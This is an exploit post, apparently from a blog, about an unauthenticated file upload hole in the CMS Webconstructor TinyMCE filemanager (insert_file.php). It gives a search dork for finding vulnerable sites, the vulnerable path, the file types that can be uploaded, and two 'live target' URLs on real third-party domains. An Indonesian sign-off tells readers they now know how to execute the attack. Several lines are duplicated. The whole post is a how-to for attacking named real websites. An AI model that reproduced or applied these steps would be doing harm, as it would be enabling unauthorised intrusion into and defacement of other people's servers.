===============================================
Exploit Title: CMS Webconstructor Remote File Upload Vulnerability
Dork: intext:CMS: webconstructor.pl
Author: BadBoy
Category: Remote, Webapps
Tested on: Windows Xp SP3
Exploit Title: CMS Webconstructor Remote File Upload Vulnerability
Dork: intext:CMS: webconstructor.pl
Author: BadBoy
Category: Remote, Webapps
Tested on: Windows Xp SP3
===============================================
-> Exploit <-
http://[localhost]/PATH/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
http://[localhost]/PATH/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
-> Allowed File <-
You can upload ,html ,pdf ,ppt ,txt ,doc ,jpg, etc except php, php4, asp
You can upload ,html ,pdf ,ppt ,txt ,doc ,jpg, etc except php, php4, asp
-> Preview <-
- You can see if you success upload file.
- You can see if you success upload file.
-> Live Target <-
- http://mexico-extreme.com/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
– http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
- http://mexico-extreme.com/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
– http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
===============================================
Sudah cukup begitu, saya rasa kalian sudah mengerti bagaimana cara eksekusi nya hehe, kalau yang bingung? Komen aja di bawah, InsyaAllah saya feedback dengan cepat
Semoga bermanfaat aja ya, Wassalamualaikum
![LS++ [ LS colors installation ]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG3ppun4aTMWhyphenhyphenPElcgzsZbX_dF-RdEaaof6TlfmaQVIq-QxKEqhhSmhqld3UbxgQEDLRbteguYe816H_5tjVmD57YrPN0H0Cd6qgE43vs6E5FWPfSiXAyrGN95lfCEjc_2dtikmA1OZCN/s72-c/687474703a2f2f646576656c2e6a6170682e73652f4170702d6c732532622532622f6c732532622532625f787465726d2e706e67.png "LS++ [ LS colors installation ]")
0 comments